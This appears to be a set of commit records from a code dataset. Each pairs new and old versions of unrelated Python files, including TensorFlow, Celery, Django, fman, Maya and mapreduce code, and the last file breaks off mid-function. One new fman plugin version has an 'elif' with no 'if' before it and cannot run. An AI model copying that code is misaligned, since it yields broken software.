This function can be called at the beginning of the program (before `Tensors`,
`Graphs` or other structures have been created, and before devices have been
initialized. It switches all global behaviors that are different between
TensorFlow 1.x and 2.x to behave as intended for 2.x.
This function is called in the main TensorFlow `__init__.py` file, user should
not need to call it, except during complex migrations.
"""
# TF2 behavior is enabled if either 1) enable_v2_behavior() is called or
# 2) the TF2_BEHAVIOR=1 environment variable is set. In the latter case,
# the modules below independently check if tf2.enabled().
tf2.enable()
ops.enable_eager_execution()
tensor_shape.enable_v2_tensorshape() # Also switched by tf2
variable_scope.enable_resource_variables()
# Enables TensorArrayV2 and control flow V2.
control_flow_v2_toggles.enable_control_flow_v2()
@tf_export(v1=["disable_v2_behavior"])
def disable_v2_behavior():
"""Disables TensorFlow 2.x behaviors.
This function can be called at the beginning of the program (before `Tensors`,
`Graphs` or other structures have been created, and before devices have been
initialized. It switches all global behaviors that are different between
TensorFlow 1.x and 2.x to behave as intended for 1.x.
User can call this function to disable 2.x behavior during complex migrations.
"""
tf2.disable()
ops.disable_eager_execution()
tensor_shape.disable_v2_tensorshape() # Also switched by tf2
variable_scope.disable_resource_variables()
# Disables TensorArrayV2 and control flow V2.
control_flow_v2_toggles.disable_control_flow_v2()
| Python | 0 |
e39c2e0c3dae39ee380a98a1aa662d14d1a1191e | Add new keyfile | dexter/config/celeryconfig.py | dexter/config/celeryconfig.py | from celery.schedules import crontab
# uses AWS creds from the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY env variables
BROKER_URL = 'sqs://'
BROKER_TRANSPORT_OPTIONS = {
'region': 'eu-west-1',
'polling_interval': 15 * 1,
'queue_name_prefix': 'mma-dexter-',
'visibility_timeout': 3600*12,
}
# all our tasks can by retried if the worker fails
CELERY_ACKS_LATE = True
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TIMEZONE = 'Africa/Johannesburg'
CELERY_ENABLE_UTC = True
CELERYBEAT_SCHEDULE = {
'fetch-yesterdays-feeds': {
'schedule': crontab(hour=2, minute=0),
'task': 'dexter.tasks.fetch_yesterdays_feeds',
},
'back-process-feeds': {
'schedule': crontab(hour=11, minute=0),
'task': 'dexter.tasks.back_process_feeds',
},
'fetch_yesterdays_feeds_rerun': {
'schedule': crontab(hour=15, minute=0),
'task': 'dexter.tasks.back_process_feeds',
},
# 'backfill-taxonomies': {
# 'schedule': crontab(hour=21, minute=0),
# 'task': 'dexter.tasks.backfill_taxonomies',
# },
}
| from celery.schedules import crontab
# uses AWS creds from the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY env variables
BROKER_URL = 'sqs://'
BROKER_TRANSPORT_OPTIONS = {
'region': 'eu-west-1',
'polling_interval': 15 * 1,
'queue_name_prefix': 'mma-dexter-',
'visibility_timeout': 3600*12,
}
# all our tasks can by retried if the worker fails
CELERY_ACKS_LATE = True
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TIMEZONE = 'Africa/Johannesburg'
CELERY_ENABLE_UTC = True
CELERYBEAT_SCHEDULE = {
'fetch-yesterdays-feeds': {
'schedule': crontab(hour=1, minute=0),
'task': 'dexter.tasks.fetch_yesterdays_feeds',
},
'back-process-feeds': {
'schedule': crontab(hour=11, minute=0),
'task': 'dexter.tasks.back_process_feeds',
},
'fetch_yesterdays_feeds_rerun': {
'schedule': crontab(hour=12, minute=0),
'task': 'dexter.tasks.back_process_feeds',
},
# 'backfill-taxonomies': {
# 'schedule': crontab(hour=21, minute=0),
# 'task': 'dexter.tasks.backfill_taxonomies',
# },
}
| Python | 0.000002 |
9a3d81d38e8b5885f54198f41b27d1d813c83e74 | Add django_extensions | director/director/settings.py | director/director/settings.py | """
Django settings for director project.
Uses ``django-configurations``. For more on this package, see
https://github.com/jazzband/django-configurations
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
from configurations import Configuration, values
class Common(Configuration):
"""
Configuration settings common to both development and production
"""
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'director.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'director.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
#
# Defaults to `db.sqlite3` but can be set using `DJANGO_DATABASE_URL` env var
# Note that the three leading slashes are *intentional*
# See https://github.com/kennethreitz/dj-database-url#url-schema
DATABASES = values.DatabaseURLValue(
'sqlite:///%s/db.sqlite3' % BASE_DIR,
environ_prefix='DJANGO' # For consistent naming with other env vars
)
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
# Can be set using `DJANGO_STATIC_URL` env var
STATIC_URL = values.Value('/static/')
class Dev(Common):
"""
Configuration settings used in development
"""
# Ensure debug is always true in development
DEBUG = True
# This variable must always be set, even in development.
SECRET_KEY = 'not-a-secret-key'
# Additional apps only used in development
INSTALLED_APPS = Common.INSTALLED_APPS + [
'django_extensions'
]
class Prod(Common):
"""
Configuration settings used in production
"""
# Ensure debug is always false in production
DEBUG = False
# Require that a `DJANGO_SECRET_KEY` environment
# variable is set during production
SECRET_KEY = values.SecretValue()
| """
Django settings for director project.
Uses ``django-configurations``. For more on this package, see
https://github.com/jazzband/django-configurations
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
from configurations import Configuration, values
class Common(Configuration):
"""
Configuration settings common to both development and production
"""
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'director.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'director.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
#
# Defaults to `db.sqlite3` but can be set using `DJANGO_DATABASE_URL` env var
# Note that the three leading slashes are *intentional*
# See https://github.com/kennethreitz/dj-database-url#url-schema
DATABASES = values.DatabaseURLValue(
'sqlite:///%s/db.sqlite3' % BASE_DIR,
environ_prefix='DJANGO' # For consistent naming with other env vars
)
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
# Can be set using `DJANGO_STATIC_URL` env var
STATIC_URL = values.Value('/static/')
class Dev(Common):
"""
Configuration settings used in development
"""
# Ensure debug is always true in development
DEBUG = True
# This variable must always be set, even in development.
SECRET_KEY = 'not-a-secret-key'
class Prod(Common):
"""
Configuration settings used in production
"""
# Ensure debug is always false in production
DEBUG = False
# Require that a `DJANGO_SECRET_KEY` environment
# variable is set during production
SECRET_KEY = values.SecretValue()
| Python | 0.000005 |
c4f7f2025a6089ec0ddcb190eaf4c020804b384b | make the call to core commands more explicit | toggleselection/__init__.py | toggleselection/__init__.py | # Override commands that toggle item selection to automatically compute and instantly display
# combined filesize for selected files and the number of selected folders/files
from fman import DirectoryPaneCommand, DirectoryPaneListener, load_json, save_json, PLATFORM
from core.commands.util import is_hidden
from fman.url import splitscheme
import json
from statusbarextended import StatusBarExtended
class _CorePaneCommand(DirectoryPaneCommand): # copy from core/commands/__init__.py
def select_all(self):
self.pane.select_all()
def deselect( self):
self.pane.clear_selection()
def move_cursor_down( self, toggle_selection=False):
self.pane.move_cursor_down( toggle_selection)
def move_cursor_up( self, toggle_selection=False):
self.pane.move_cursor_up( toggle_selection)
def move_cursor_page_up( self, toggle_selection=False):
self.pane.move_cursor_page_up( toggle_selection)
def move_cursor_page_down(self, toggle_selection=False):
self.pane.move_cursor_page_down(toggle_selection)
def move_cursor_home( self, toggle_selection=False):
self.pane.move_cursor_home( toggle_selection)
def move_cursor_end( self, toggle_selection=False):
self.pane.move_cursor_end( toggle_selection)
class CommandEmpty(): # to avoid duplicate command execution (and "return '', args" hangs)
def __call__(self):
pass
class SelectionOverride(DirectoryPaneListener):
def on_command(self, command_name, args):
self.show_selected_files()
return 'command_empty', args
elif command_name in (
'select_all', 'deselect'):
getattr(_CorePaneCommand, command_name)(self)
self.show_selected_files()
return 'command_empty', args
elif command_name in ( # commands that can pass a 'toggle_selection' argument
'move_cursor_down' , 'move_cursor_up' ,
'move_cursor_page_down', 'move_cursor_page_up',
'move_cursor_home' , 'move_cursor_end'):
getattr(_CorePaneCommand, command_name)(self, args)
self.show_selected_files()
return 'command_empty', args
def show_selected_files(self):
statusBarExtendedEnabled = load_json('StatusBarExtended.json')
if statusBarExtendedEnabled:
statusBarExtendedEnabledJson = json.loads(statusBarExtendedEnabled)
if statusBarExtendedEnabledJson['enabled'] == True:
StatusBarExtended.show_selected_files(self)
| # Override commands that toggle item selection to automatically compute and instantly display
# combined filesize for selected files and the number of selected folders/files
from fman import DirectoryPaneListener, load_json
import json
from statusbarextended import StatusBarExtended
class CommandEmpty(): # to avoid duplicate command execution (and "return '', args" hangs)
def __call__(self):
pass
class SelectionOverride(DirectoryPaneListener):
def on_command(self, command_name, args):
if command_name in ('select_all'): # def ^A
self.pane.select_all()
self.show_selected_files()
return 'command_empty', args
elif command_name in ('deselect'): # def ^D
self.pane.clear_selection()
self.show_selected_files()
return 'command_empty', args
elif command_name in ( # commands that can pass a 'toggle_selection' argument
'move_cursor_down' , 'move_cursor_up' ,
'move_cursor_page_down', 'move_cursor_page_up',
'move_cursor_home' , 'move_cursor_end'):
if args.get('toggle_selection'): # select item → update statusbar → pass False arg
file_under_cursor = self.pane.get_file_under_cursor()
if file_under_cursor:
self.pane.toggle_selection(file_under_cursor)
self.show_selected_files()
new_args = dict(args)
new_args['toggle_selection'] = False
return command_name, new_args
def show_selected_files(self):
statusBarExtendedEnabled = load_json('StatusBarExtended.json')
if statusBarExtendedEnabled:
statusBarExtendedEnabledJson = json.loads(statusBarExtendedEnabled)
if statusBarExtendedEnabledJson['enabled'] == True:
StatusBarExtended.show_selected_files(self)
| Python | 0 |
50eedeaaa401d192c2681d58c83981961a1c4ff1 | fix update profile | lxxl/services/graph/users/profile.py | lxxl/services/graph/users/profile.py | from lxxl.lib import router, output
from lxxl.lib.app import Controller, Error
from lxxl.lib.storage import Db, ASCENDING
from lxxl.lib.flush import FlushRequest
from lxxl.model.users import User, Factory as UserFactory, Duplicate
import datetime
class Profile(router.Root):
def get(self, environ, params):
try:
Controller().checkToken()
#relation = Controller().getRelation()
me = Controller().getUid()
# fix privacy
# if relation < 1:
# output.error('#ApiKeyUnauthorized', 403)
user = UserFactory.get(params['uid'])
if not user:
output.error('unknown user', 404)
#XXX uncomment me ?
# if user.activate == 0:
# output.error('unactivated user', 404)
result = {}
Db().get('profile').ensure_index(
[('uid', ASCENDING)], {'background': True})
profile = Db().get('profile').find_one({'uid': params['uid']})
if not profile:
profile = {}
profile['datas'] = {}
result['profile'] = profile['datas']
result['email'] = user.email
result['username'] = user.username
if user.premium:
result['premium'] = True
if user.hasAvatar is True:
result['hasAvatar'] = True
else:
result['hasAvatar'] = False
result['friends'] = user.friends_count
output.success(result, 200)
except Error:
pass
return Controller().getResponse(True)
def set(self, environ, params):
try:
Controller().checkToken()
#relation = Controller().getRelation()
me = Controller().getUid()
apikey = Controller().getApiKey()
if Controller().getApiType() != 1:
output.error('Not your api business', 403)
# if relation != 2:
# output.error(
# '#ApiKeyUnauthorized : none of your business', 403)
user = UserFactory.get(params['uid'])
if not user:
output.error('unknown user', 404)
data = Controller().getRequest().json
if not data:
output.error('bad json format', 400)
Db().get('profile').update({'uid': me}, {
'datas': data,
'uid': me,
'updated': datetime.datetime.utcnow()
}, True)
output.success('profile updated', 200)
except Error:
pass
return Controller().getResponse(True)
| from lxxl.lib import router, output
from lxxl.lib.app import Controller, Error
from lxxl.lib.storage import Db, ASCENDING
from lxxl.lib.flush import FlushRequest
from lxxl.model.users import User, Factory as UserFactory, Duplicate
import datetime
class Profile(router.Root):
def get(self, environ, params):
try:
Controller().checkToken()
#relation = Controller().getRelation()
me = Controller().getUid()
# fix privacy
# if relation < 1:
# output.error('#ApiKeyUnauthorized', 403)
user = UserFactory.get(params['uid'])
if not user:
output.error('unknown user', 404)
#XXX uncomment me ?
# if user.activate == 0:
# output.error('unactivated user', 404)
result = {}
Db().get('profile').ensure_index(
[('uid', ASCENDING)], {'background': True})
profile = Db().get('profile').find_one({'uid': params['uid']})
if not profile:
profile = {}
profile['datas'] = {}
result['profile'] = profile['datas']
result['email'] = user.email
result['username'] = user.username
if user.premium:
result['premium'] = True
if user.hasAvatar is True:
result['hasAvatar'] = True
else:
result['hasAvatar'] = False
result['friends'] = user.friends_count
output.success(result, 200)
except Error:
pass
return Controller().getResponse(True)
def set(self, environ, params):
try:
Controller().checkToken()
#relation = Controller().getRelation()
me = Controller().getUid()
apikey = Controller().getApiKey()
if Controller().getApiType() != 1:
output.error('Not your api business', 403)
# if relation != 2:
# output.error(
# '#ApiKeyUnauthorized : none of your business', 403)
user = UserFactory.get(params['uid'])
if not user:
output.error('unknown user', 404)
data = Controller().getPostJson()
if not data:
output.error('bad json format', 400)
Db().get('profile').update({'uid': me}, {
'datas': data,
'uid': me,
'updated': datetime.datetime.utcnow()
}, True)
output.success('profile updated', 200)
except Error:
pass
return Controller().getResponse(True)
| Python | 0.000001 |
9a4e2f88eba716ef607b8c476509cac5e58475f7 | Update mapper_lowercase.py | mapreduce/filter/mapper_lowercase.py | mapreduce/filter/mapper_lowercase.py | #!/usr/bin/env python
import sys
# Open just for read
dbpediadb = set(open('dbpedia_labels.txt').read().splitlines())
dbpediadb_lower = set(x.lower() for x in open('dbpedia_labels.txt').read().splitlines())
for line in sys.stdin:
# remove leading and trailing whitespace
line = line.strip()
# split the line into words
ngram, num = line.split('\t')
if ngram in dbpediadb:
print '%s\t%s|--|%s' % (ngram.lower(), ngram.replace(' ', '_'), num)
if ngram.lower() in dbpediadb_lower:
print '%s\t%s|--|%s' % (ngram.lower(), 'lower', num)
| #!/usr/bin/env python
import sys
# Open just for read
dbpediadb = set(open('dbpedia_labels.txt').read().splitlines())
dbpediadb_lower = set(x.lower() for x in open('dbpedia_labels.txt').read().splitlines())
for line in sys.stdin:
# remove leading and trailing whitespace
line = line.strip()
# split the line into words
ngram, num = line.split('\t')
if ngram in dbpediadb:
print '%s\t%s|--|%s' % (ngram.lower(), ngram.replace(' ', '_'), num)
if ngram in dbpediadb_lower:
print '%s\t%s|--|%s' % (ngram.lower(), 'lower', num)
| Python | 0.000067 |
84ce27775b7e04955a15a0eb1e277db3e447b81f | fix SlidingCloth | mayaLib/rigLib/utils/slidingCloth.py | mayaLib/rigLib/utils/slidingCloth.py | __author__ = 'Lorenzo Argentieri'
import pymel.core as pm
from mayaLib.rigLib.utils import skin
from mayaLib.rigLib.utils import deform
class SlidingCloth():
def __init__(self, mainSkinGeo, proxySkinGeo, mainClothGeo, proxyClothGeo, rigModelGrp=None):
"""
Setup Sliding Cloth deformation
:param mainSkinGeo: str
:param proxySkinGeo: str
:param mainClothGeo: str
:param proxyClothGeo: str
"""
if mainSkinGeo and mainClothGeo:
self.mainSkinGeo = pm.ls(mainSkinGeo)[0]
self.mainClothGeo = pm.ls(mainClothGeo)[0]
else:
print 'No valid Geo!'
if proxySkinGeo:
self.proxySkinGeo = pm.ls(proxySkinGeo)[0]
else:
print 'Make Skin proxy Geo!'
if proxyClothGeo:
self.proxyClothGeo = pm.ls(proxyClothGeo)[0]
else:
print 'Make Cloth proxy GEO!'
# setup skin proxy geo
skin.copyBind(self.mainSkinGeo, self.proxySkinGeo)
# setup cloth proxy geo
skin.copyBind(self.mainSkinGeo, self.proxyClothGeo)
cMuscleDeformer = deform.cMuscleSystemDeformer(self.proxyClothGeo)
cMuscleDeformer.enableRelax.set(1)
cMuscleDeformer.relaxCompress.set(10)
cMuscleDeformer.enableSmooth.set(1)
shrinkWrapDeformer = deform.shrinkWrapDeformer(self.proxyClothGeo, self.proxySkinGeo)
shrinkWrapDeformer.shapePreservationEnable.set(1)
polySmoothDeformer = pm.polySmooth(self.proxyClothGeo)[0]
# wrap main Cloth Geo
wrapDeformer = deform.wrapDeformer(self.mainClothGeo, self.proxyClothGeo)
baseObj = pm.listConnections(wrapDeformer.basePoints, source=True)[0]
if rigModelGrp:
pm.parent(baseObj, rigModelGrp)
# save attribute
self.baseObj = baseObj
def getWrapBaseObj(self):
return self.baseObj | __author__ = 'Lorenzo Argentieri'
import pymel.core as pm
from mayaLib.rigLib.utils import skin
from mayaLib.rigLib.utils import deform
class SlidingCloth():
def __init__(self, mainSkinGeo, proxySkinGeo, mainClothGeo, proxyClothGeo):
"""
Setup Sliding Cloth deformation
:param mainSkinGeo: str
:param proxySkinGeo: str
:param mainClothGeo: str
:param proxyClothGeo: str
"""
if mainSkinGeo and mainClothGeo:
self.mainSkinGeo = pm.ls(mainSkinGeo)[0]
self.mainClothGeo = pm.ls(mainClothGeo)[0]
else:
print 'No valid Geo!'
if proxySkinGeo:
self.proxySkinGeo = pm.ls(proxySkinGeo)[0]
else:
print 'Make Skin proxy Geo!'
if proxyClothGeo:
self.proxyClothGeo = pm.ls(proxyClothGeo)[0]
else:
print 'Make Cloth proxy GEO!'
# setup skin proxy geo
skin.copyBind(self.mainSkinGeo, self.proxySkinGeo)
# setup cloth proxy geo
skin.copyBind(self.mainSkinGeo, self.proxyClothGeo)
cMuscleDeformer = deform.cMuscleSystemDeformer(self.proxyClothGeo)
cMuscleDeformer.enableRelax.set(1)
cMuscleDeformer.relaxCompress.set(10)
cMuscleDeformer.enableSmooth.set(1)
shrinkWrapDeformer = deform.shrinkWrapDeformer(self.proxyClothGeo, self.proxySkinGeo)
shrinkWrapDeformer.shapePreservationEnable.set(1)
polySmoothDeformer = pm.polySmooth(self.proxyClothGeo)[0]
# wrap main Cloth Geo
wrapDeformer = deform.wrapDeformer(self.mainClothGeo, self.proxyClothGeo) | Python | 0.000001 |
f7060b65464b24bb16a8cf4704c68fa1348d655c | bump version | crossbar/crossbar/__init__.py | crossbar/crossbar/__init__.py | ###############################################################################
##
## Copyright (C) 2011-2014 Tavendo GmbH
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU Affero General Public License, version 3,
## as published by the Free Software Foundation.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Affero General Public License for more details.
##
## You should have received a copy of the GNU Affero General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
##
###############################################################################
__doc__ = """
Crossbar.io - Polyglot application router.
For more information, please visit:
* Documentation: https://github.com/crossbario/crossbar/wiki
* Homepage: http://crossbar.io/
* Source code: https://github.com/crossbario/crossbar
Open-source licensed under the GNU Affero General Public License version 3.
Created by Tavendo GmbH. Get in contact at http://tavendo.com
"""
__version__ = "0.9.4-3"
| ###############################################################################
##
## Copyright (C) 2011-2014 Tavendo GmbH
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU Affero General Public License, version 3,
## as published by the Free Software Foundation.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Affero General Public License for more details.
##
## You should have received a copy of the GNU Affero General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
##
###############################################################################
__doc__ = """
Crossbar.io - Polyglot application router.
For more information, please visit:
* Documentation: https://github.com/crossbario/crossbar/wiki
* Homepage: http://crossbar.io/
* Source code: https://github.com/crossbario/crossbar
Open-source licensed under the GNU Affero General Public License version 3.
Created by Tavendo GmbH. Get in contact at http://tavendo.com
"""
__version__ = "0.9.4-2"
| Python | 0 |
c0e09993facdd76e7b1dfbab97285464f83980bb | Update version | cast_convert/__init__.py | cast_convert/__init__.py | #!/usr/bin/env python3
__version__ = '0.1.7.17'
from .cmd import cmd as command
from .watch import *
from . import *
from .convert import *
from .media_info import *
import click
@click.command(help="Print version")
def version():
print(__version__)
command.add_command(version)
| #!/usr/bin/env python3
__version__ = '0.1.7.11'
from .cmd import cmd as command
from .watch import *
from . import *
from .convert import *
from .media_info import *
import click
@click.command(help="Print version")
def version():
debug_print(__version__)
command.add_command(version)
| Python | 0 |
b5cd4ff2b02151bca966c53b80dbea8911a7a6b2 | Upgrade celery.utils.encoding from kombu | celery/utils/encoding.py | celery/utils/encoding.py | """
celery.utils.encoding
====================
Utilities to encode text, and to safely emit text from running
applications without crashing with the infamous :exc:`UnicodeDecodeError`
exception.
"""
from __future__ import absolute_import
import sys
import traceback
__all__ = ["str_to_bytes", "bytes_to_str", "from_utf8",
"default_encoding", "safe_str", "safe_repr"]
is_py3k = sys.version_info >= (3, 0)
if is_py3k:
def str_to_bytes(s):
if isinstance(s, str):
return s.encode()
return s
def bytes_to_str(s):
if isinstance(s, bytes):
return s.decode()
return s
def from_utf8(s, *args, **kwargs):
return s
else:
def str_to_bytes(s): # noqa
if isinstance(s, unicode):
return s.encode()
return s
def bytes_to_str(s): # noqa
return s
def from_utf8(s, *args, **kwargs): # noqa
return s.encode("utf-8", *args, **kwargs)
if sys.platform.startswith("java"):
def default_encoding():
return "utf-8"
else:
def default_encoding(): # noqa
return sys.getfilesystemencoding()
def safe_str(s, errors="replace"):
s = bytes_to_str(s)
if not isinstance(s, basestring):
return safe_repr(s, errors)
return _safe_str(s, errors)
def _safe_str(s, errors="replace"):
if is_py3k:
return s
encoding = default_encoding()
try:
if isinstance(s, unicode):
return s.encode(encoding, errors)
return unicode(s, encoding, errors)
except Exception, exc:
return "<Unrepresentable %r: %r %r>" % (
type(s), exc, "\n".join(traceback.format_stack()))
def safe_repr(o, errors="replace"):
try:
return repr(o)
except Exception:
return _safe_str(o, errors)
| """
celery.utils.encoding
=====================
Utilties to encode text, and to safely emit text from running
applications without crashing with the infamous :exc:`UnicodeDecodeError`
exception.
"""
from __future__ import absolute_import
import sys
import traceback
__all__ = ["str_to_bytes", "bytes_to_str", "from_utf8",
"default_encoding", "safe_str", "safe_repr"]
is_py3k = sys.version_info >= (3, 0)
if sys.version_info >= (3, 0):
def str_to_bytes(s):
if isinstance(s, str):
return s.encode()
return s
def bytes_to_str(s):
if isinstance(s, bytes):
return s.decode()
return s
def from_utf8(s, *args, **kwargs):
return s
else:
def str_to_bytes(s): # noqa
return s
def bytes_to_str(s): # noqa
return s
def from_utf8(s, *args, **kwargs): # noqa
return s.encode("utf-8", *args, **kwargs)
if sys.platform.startswith("java"):
def default_encoding():
return "utf-8"
else:
def default_encoding(): # noqa
return sys.getfilesystemencoding()
def safe_str(s, errors="replace"):
s = bytes_to_str(s)
if not isinstance(s, basestring):
return safe_repr(s, errors)
return _safe_str(s, errors)
def _safe_str(s, errors="replace"):
if is_py3k:
return s
encoding = default_encoding()
try:
if isinstance(s, unicode):
return s.encode(encoding, errors)
return unicode(s, encoding, errors)
except Exception, exc:
return "<Unrepresentable %r: %r %r>" % (
type(s), exc, "\n".join(traceback.format_stack()))
def safe_repr(o, errors="replace"):
try:
return repr(o)
except Exception:
return _safe_str(o, errors)
| Python | 0 |
a0ff8cc15df5cd9668e11eba3b5e7406b33dcfc5 | fix RemovedInDjango19Warning on django.utils.importlib | celery_haystack/utils.py | celery_haystack/utils.py | from django.core.exceptions import ImproperlyConfigured
try:
from importlib import import_module
except ImportError:
from django.utils.importlib import import_module
from django.db import connection
from haystack.utils import get_identifier
from .conf import settings
def get_update_task(task_path=None):
import_path = task_path or settings.CELERY_HAYSTACK_DEFAULT_TASK
module, attr = import_path.rsplit('.', 1)
try:
mod = import_module(module)
except ImportError as e:
raise ImproperlyConfigured('Error importing module %s: "%s"' %
(module, e))
try:
Task = getattr(mod, attr)
except AttributeError:
raise ImproperlyConfigured('Module "%s" does not define a "%s" '
'class.' % (module, attr))
return Task()
def enqueue_task(action, instance):
"""
Common utility for enqueing a task for the given action and
model instance.
"""
identifier = get_identifier(instance)
kwargs = {}
if settings.CELERY_HAYSTACK_QUEUE:
kwargs['queue'] = settings.CELERY_HAYSTACK_QUEUE
if settings.CELERY_HAYSTACK_COUNTDOWN:
kwargs['countdown'] = settings.CELERY_HAYSTACK_COUNTDOWN
task = get_update_task()
if hasattr(connection, 'on_commit'):
connection.on_commit(
lambda: task.apply_async((action, identifier), {}, **kwargs)
)
else:
task.apply_async((action, identifier), {}, **kwargs)
| from django.core.exceptions import ImproperlyConfigured
from django.utils.importlib import import_module
from django.db import connection
from haystack.utils import get_identifier
from .conf import settings
def get_update_task(task_path=None):
import_path = task_path or settings.CELERY_HAYSTACK_DEFAULT_TASK
module, attr = import_path.rsplit('.', 1)
try:
mod = import_module(module)
except ImportError as e:
raise ImproperlyConfigured('Error importing module %s: "%s"' %
(module, e))
try:
Task = getattr(mod, attr)
except AttributeError:
raise ImproperlyConfigured('Module "%s" does not define a "%s" '
'class.' % (module, attr))
return Task()
def enqueue_task(action, instance):
"""
Common utility for enqueing a task for the given action and
model instance.
"""
identifier = get_identifier(instance)
kwargs = {}
if settings.CELERY_HAYSTACK_QUEUE:
kwargs['queue'] = settings.CELERY_HAYSTACK_QUEUE
if settings.CELERY_HAYSTACK_COUNTDOWN:
kwargs['countdown'] = settings.CELERY_HAYSTACK_COUNTDOWN
task = get_update_task()
if hasattr(connection, 'on_commit'):
connection.on_commit(
lambda: task.apply_async((action, identifier), {}, **kwargs)
)
else:
task.apply_async((action, identifier), {}, **kwargs)
| Python | 0 |
7d89c9c3229ebd7d8b56edf211e7020c3fad29a0 | add support for msgpack | utils/encoders.py | utils/encoders.py | # Copyright (C) 2015 SlimRoms Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
SUPPORTED_ENCODERS = {}
import json
def json_encode(obj, pretty=False):
kwargs = {}
if pretty:
kwargs['indent'] = 4
kwargs['separators'] = (',', ': ')
return json.dumps(obj, **kwargs).replace("</", "<\\/")
SUPPORTED_ENCODERS.update({
'json': {
'headers': (("Content-Type", "application/json; charset=UTF-8"),),
'encoder': json_encode
}
})
try:
import xmltodict
except ImportError:
pass
else:
def xml_encode(obj, pretty=False):
if len(obj) == 1:
obj = {'root': obj}
return xmltodict.unparse(obj, pretty=pretty)
SUPPORTED_ENCODERS.update({
'xml': {
'headers': (("Content-Type", "application/xml; charset=UTF-8"),),
'encoder': xml_encode
}
})
try:
import yaml
except ImportError:
pass
else:
def yaml_encode(obj, pretty=False):
